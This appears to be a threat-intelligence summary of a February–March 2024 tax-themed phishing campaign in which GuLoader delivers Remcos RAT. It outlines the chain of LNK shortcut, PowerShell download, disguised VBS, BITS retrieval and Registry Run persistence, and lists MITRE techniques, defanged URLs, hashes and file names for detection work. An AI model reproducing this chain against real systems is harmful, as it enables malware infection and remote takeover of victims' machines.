Tax Season Alert: Beware of GuLoader and Remcos RAT

eSentire’s TRU observed tax-themed phishing campaigns in Feb–Mar 2024 delivering Remcos RAT via the GuLoader chain that used password-protected ZIPs hosted on Adobe Document Cloud and malicious LNK/PowerShell scripts. The attack chain downloads a disguised PNG (jantickee[.]com) saved as a VBS, spawns an obfuscated PowerShell to retrieve a Base64 GuLoader payload (Startvrdier.Fre) into %AppData% and establishes persistence via a Registry Run key. #GuLoader #Remcos #AdobeDocumentCloud

Keypoints

Tax-themed phishing emails delivered Remcos RAT as the final payload using GuLoader as the loader.
Malicious content was distributed via password-protected ZIP archives hosted on Adobe Document Cloud to appear legitimate.
The ZIP contained an encrypted document (2023clearance.doc, MD5: 35b78f9b…) and a shortcut BurkeDocuments.pdf.lnk (MD5: 6213ff41…), which triggers execution.
The LNK launches a PowerShell command that downloads a supposed PNG from hxxps://jantickee[.]com/wp-content/Stanles2.png, saves it as Fjoua.vbs in Public, and executes it while dropping a decoy PDF (Shl3Dfdr.pdf).
The VBS spawns a heavily obfuscated PowerShell script that reconstructs strings, uses the BITS/BitTransfer module to retrieve and decode a Base64 GuLoader payload (Startvrdier.Fre) into %AppData%, and extracts an inner GuLoader blob via substring operations.
Persistence is established by adding the obfuscated PowerShell to the Registry Run key to execute on startup.
Investigators noted the original delivery URL went offline but recovered payloads from an alternative similar URL and documented multiple related indicators of compromise.

MITRE Techniques

[T1566] Phishing – Delivery vector used tax-themed phishing emails to lure victims; (‘we observed a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader’).
[T1204] User Execution – Execution relied on a shortcut file that triggers commands when opened; (‘the shortcut file initiates a PowerShell command to download a file from the specified URL’).
[T1059.001] PowerShell – Malicious PowerShell scripts were spawned and executed to reconstruct payloads and perform downloads; (‘The retrieved VBS file spawns the heavily obfuscated PowerShell script’).
[T1105] Ingress Tool Transfer – The BitTransfer module (BITS) was used to download the GuLoader payload from the Internet; (‘The PowerShell script is responsible for retrieving the GuLoader payload via the BitTransfer module in PowerShell’).
[T1027] Obfuscated Files or Information – Scripts were heavily obfuscated and used position-based string concatenation to hide payloads; (‘manipulates strings by selectively concatenating characters based on their positions’).
[T1036] Masquerading – The payload used misleading file extensions to appear benign (PNG image extension used for malicious content); (‘despite its PNG image extension, contains malicious content’).
[T1547.001] Registry Run Keys/Start Folder – Persistence was achieved via a Registry Run key to execute the obfuscated PowerShell at startup; (‘The persistence is achieved via the Registry Run Key to execute the obfuscated PowerShell script’).

Indicators of Compromise

[File hash] Downloaded artifacts – 2023clearance.doc (MD5: 35b78f9b4f1122f4a347c1ce37367278), BurkeDocuments.pdf.lnk (MD5: 6213ff411cd8625c632de49cd6fe46c6).
[File names] Dropped/created files – Fjoua.vbs (downloaded & executed), Shl3Dfdr.pdf (decoy PDF), Startvrdier.Fre (Base64-encoded GuLoader payload in %AppData%).
[Domain/URL] Payload download source – hxxps://jantickee[.]com/wp-content/Stanles2.png (PNG extension but malicious content); original Adobe-hosted ZIP link on Adobe Document Cloud (password-protected ZIP) used for delivery.
[Other] Alternate artifacts – substring-extracted inner GuLoader blob from decoded payload and Registry Run key entries for persistence (see article for exact registry name and values).

The phishing messages contained a password-protected ZIP hosted on Adobe Document Cloud that held an encrypted document (2023clearance.doc, MD5 35b78f9b…) and a malicious shortcut BurkeDocuments.pdf.lnk (MD5 6213ff41…). Executing the LNK launches a PowerShell command which downloads a file from hxxps://jantickee[.]com/wp-content/Stanles2.png (a disguised PNG that is actually malicious), saves it as Fjoua.vbs in the Public folder, and runs it while dropping a decoy PDF (Shl3Dfdr.pdf).

The VBS spawns a heavily obfuscated PowerShell script that rebuilds hidden strings by selecting characters at specific offsets, then uses the BITS/BitTransfer module to retrieve a Base64-encoded GuLoader payload (written as Startvrdier.Fre under %AppData%). The script performs a substring extraction (e.g., “$Stadholder=$Regaliernes2.substring(315836,26965)”) to carve out an inner GuLoader blob, indicating nested loader layers that are decoded and executed in-memory or dropped for subsequent stages.

Persistence is achieved by creating a Registry Run key that executes the obfuscated PowerShell on startup, completing the chain that leads to the Remcos RAT as the final payload. Investigators noted the original delivery URL went offline but recovered similar payloads via alternate URLs and documented the file hashes, filenames, and domains listed above for detection and response.